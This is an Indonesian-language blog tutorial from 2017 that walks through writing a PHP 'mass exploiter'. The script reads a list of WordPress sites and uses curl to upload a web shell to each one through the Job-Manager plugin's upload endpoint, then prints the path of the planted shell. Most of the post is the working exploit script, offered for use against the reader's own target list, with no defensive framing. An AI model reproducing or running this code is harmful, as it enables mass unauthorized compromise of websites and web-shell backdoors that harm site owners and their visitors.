Monday, 9 October 2017

Belajar Membuat Mass Exploiter Sederhana Dengan PHP

Hallo...
kali ini ane mau share gimana sih cara membuat Mass Exploiter dengan PHP.


Yang pertama buat sebuah file.php di direktori C:/xampp/php dan list.txt untuk target listnya, dan tentunya juga di direktori yang sama dengan file.php

Ini contoh ane buat Mass Exploiter WordPress Job-Manager.
  • Yang pertama, buat perintah untuk melakukan input yang digunakan untuk memasukkan list.txt dan shell.
    echo "Masukkan List Anda : ";
    $list = trim(fgets(STDIN));
    echo "Masukkan Shell Anda : ";
    $shell = trim(fgets(STDIN));
  • Lalu masukkan script untuk membaca list.txt yang telah di inputkan
    echo "Masukkan List Anda : ";
    $list = trim(fgets(STDIN));
    echo "Masukkan Shell Anda : ";
    $shell = trim(fgets(STDIN));

    $open = fopen($list,"r"); //membuka list.txt untuk dibaca
    $size = filesize($list); //berapa ukuran list.txt
    $read = fread($open,$size); //membaca list.txt
    $target = explode("\r\n",$read); //memecah list.txt berdasarkan \n atau enter

    foreach($target as $targets){ //untuk mengeksekusi satu satu list.txt yang sudah dipecah tadi
    }
  • Sekarang buat perintah curl untuk melakukan post kepada target yang berada di list.txt
    echo "Masukkan List Anda : ";
    $list = trim(fgets(STDIN));
    echo "Masukkan Shell Anda : ";
    $shell = trim(fgets(STDIN));

    $open = fopen($list,"r"); //membuka list.txt untuk dibaca
    $size = filesize($list); //berapa ukuran list.txt
    $read = fread($open,$size); //membaca list.txt
    $target = explode("\r\n",$read); //memecah list.txt berdasarkan \n atau enter

    foreach($target as $targets){ //untuk mengeksekusi satu satu list.txt yang sudah dipecah tadi

    $targetvuln = "$targets/jm-ajax/upload_file"; //menambahkan exploit pada target

    $ch = curl_init(); //pembukaan curl
    curl_setopt($ch, CURLOPT_URL, $targetvuln); //melakukan post pada $targetvuln atau target yang sudah diberi exploit
    curl_setopt($ch, CURLOPT_POST, 1); //memberi nilai 1 atau TRUE pada post agar bisa melakukan post
    curl_setopt($ch, CURLOPT_POSTFIELDS, array("files[]" => "@$shell")); //melakukan post $shell pada array files[]
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //mengembalikan informasi yang diperoleh dalam bentuk file streaming, bukannya output
  • Sekarang tinggal memasukkan perintah atau script eksekusi curl agar melakukan post,
    $hajar = curl_exec($ch); //mengeksekusi query curl bernama $ch
    if($hajar){
    echo "sukses\n$targets/wp-content/uploads/job-manager-uploads/files/2017/10/$shell\n"; //untuk output sukses dan path/letak shellnya
    }else{
    echo "gagal\n";
    }
  • Jadi script full exploiternya seperti ini.
    <?php
    echo "Masukkan List Anda : ";
    $list = trim(fgets(STDIN));
    echo "Masukkan Shell Anda : ";
    $shell = trim(fgets(STDIN));

    $open = fopen($list,"r"); //membuka list.txt untuk dibaca
    $size = filesize($list); //berapa ukuran list.txt
    $read = fread($open,$size); //membaca list.txt
    $target = explode("\r\n",$read); //memecah list.txt berdasarkan \n atau enter

    foreach($target as $targets){ //untuk mengeksekusi satu satu list.txt yang sudah dipecah tadi

        echo "\n\nScanning $targets => ";

        $targetvuln = "$targets/jm-ajax/upload_file"; //menambahkan exploit pada target

        $ch = curl_init(); //pembukaan curl
        curl_setopt($ch, CURLOPT_URL, $targetvuln); //melakukan post pada $targetvuln atau target yang sudah diberi exploit
        curl_setopt($ch, CURLOPT_POST, 1); //memberi nilai 1 atau TRUE pada post agar bisa melakukan post
        curl_setopt($ch, CURLOPT_POSTFIELDS, array("files[]" => "@$shell")); //melakukan post $shell pada array files[]
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //mengembalikan informasi yang diperoleh dalam bentuk file streaming, bukannya output

        $hajar = curl_exec($ch); //mengeksekusi query curl bernama $ch
        if($hajar){
            echo "sukses\n$targets/wp-content/uploads/job-manager-uploads/files/2017/10/$shell\n"; //untuk output sukses dan path/letak shellnya
        }else{
            echo "gagal\n";
        }
    }
    ?>
  • Untuk menjalankannya tinggal memasukkan perintah php nama_exploiter.php
    baca juga : Cara Menjalankan Xploiter PHP di Windows

nb * list.txt kalian isi dengan list target kalian

Oke sekian dulu tutorial hari ini, semoga dapat menambah ilmu sobat sobat dalam belajar.
Jika ada yang tidak tau/bingung bisa langsung komentar dibawah ^_^ Terimakasih sudah berkunjung ^_^ .



Special Thanks : PETR03X - FRU_403 - Comod0x - SCYTHE404_LOL - Grav3 - ShinChan

1 comment: